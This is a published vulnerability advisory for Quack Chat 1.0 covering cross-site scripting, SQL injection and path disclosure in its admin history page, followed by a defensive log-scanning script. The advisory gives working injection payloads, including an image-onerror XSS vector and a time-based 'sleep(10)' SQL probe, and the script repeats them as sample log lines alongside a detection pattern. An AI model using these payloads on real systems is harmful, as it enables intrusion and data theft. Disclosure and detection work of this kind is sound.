- Full title: Quack Chat 1.0 - Multiple Vulnerabilities
- Date added: 2013-08-18
- Category: web applications
- Platform: php
- Description:
- Quack Chat version 1.0 suffers from cross-site scripting, path disclosure, and remote SQL injection vulnerabilities.
- ================================================================
- ###########################################################################################
- # Exploit Title: Quack Chat 1.0 - XSS / SQL Injection / Path Disclosure
- # Date: August 15, 2013
- # Exploit Author: Dylan Irzi
- # Credit goes to: websecuritydev.com
- # Vendor Homepage: http://www.quack-chat.com/
- # Tested on: Win8 & Linux Mint
- # Affected Version : 1.0
- # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
- # Greetz: All team WebSecuritydev.
- ###########################################################################################
- Cross Site Scripting:
- Affected files:
- qchat.php
- qc_admin/index.php?p=history
- PoC:
- localhost/qchat.php
- Vector: ""><img src=x onerror=prompt(/XSS/);>>
- Input:
- <input id="name" type="text" style="width:200px;" name="name">
- Is Reflected: localhost/qc_admin/index.php?p=history
- PoC #2:
- localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)
- Example:
- localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E
- -------------------------------------------------------------------
- SQL Injection
- localhost/qc_admin/index.php?p=history&id=(SQL Injection)
- localhost/qc_admin/index.php?p=history&page=(SQL Injection)
- # Exploit-DB note: Here's a PoC:
- # <server>/qc_admin/index.php?p=history&id=1 and sleep(10)
- Accept: */*
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
- Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e
- (Replace with a valid session cookie)
- -------------------------------------------------------------------
- Path Disclosure
- localhost/qc_admin/index.php?p=history&id='
- in /var/www/chat/qc_admin/index.php on line 249
- --------------------------------------------------------------------
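A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web access-log lines for `qc_admin/index.php?p=history` requests whose `id` or `page` value is not a plain integer. The log lines are constructed samples, the combined log format is an assumption, and the keyword list is illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not real traffic); combined log format is assumed.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Aug/2013:10:00:01 +0000] "GET /qc_admin/index.php?p=history&page=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Aug/2013:10:00:07 +0000] "GET /qc_admin/index.php?p=history&id=1%20and%20sleep(10) HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Aug/2013:10:00:30 +0000] "GET /qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E HTTP/1.1" 200 5300',
    '203.0.113.9 - - [18/Aug/2013:10:00:41 +0000] "GET /qc_admin/index.php?p=history&id=%27 HTTP/1.1" 200 412',
    '203.0.113.7 - - [18/Aug/2013:10:01:02 +0000] "GET /qchat.php HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
NUMERIC = re.compile(r"\d{1,10}")   # the only shape id/page should ever have
MARKUP = re.compile(r'[<>"]')       # characters needed to break out of HTML
SQLISH = re.compile(r"'|\b(?:sleep|union|select|benchmark)\b", re.I)  # illustrative

def classify(value):
    """Return None for a plain integer, otherwise a short reason string."""
    if NUMERIC.fullmatch(value):
        return None
    if MARKUP.search(value):
        return "markup"
    if SQLISH.search(value):
        return "sql"
    return "non-numeric"

def scan(lines):
    """Return (line_number, parameter, reason) for suspicious history requests."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/qc_admin/index.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if query.get("p") != ["history"]:
            continue
        for param in ("id", "page"):
            for value in query.get(param, []):
                reason = classify(value)
                if reason:
                    findings.append((number, param, reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `name` field of `qchat.php` is submitted in a form body, so it does not appear in access logs and is outside what this check covers.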